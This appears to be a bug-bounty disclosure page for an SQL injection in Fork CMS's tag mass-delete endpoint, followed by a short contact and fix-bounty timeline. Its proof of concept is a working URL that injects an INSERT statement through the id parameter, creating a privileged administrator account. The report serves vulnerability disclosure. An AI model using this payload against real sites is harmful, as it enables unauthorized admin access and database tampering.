SQL Injection in forkcms/forkcms
Valid
Reported on
Oct 22nd 2021
Description
When calling the url for deleting one or more tags, the parameter id
is vulnerable for SQL injection.
Proof of Concept
Call an URL like this one (as an authenticated user).
http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete
After calling this URL, the table users
has a new entry.
Impact
The attacker can tamper data in the database as they want.
We have contacted a member of the
forkcms
team and are waiting to hear back
7 months ago
We have sent a
follow up to the
forkcms
team.
We will try again in 7 days.
7 months ago
Jelmer Prins
has been awarded the fix bounty
to join this conversation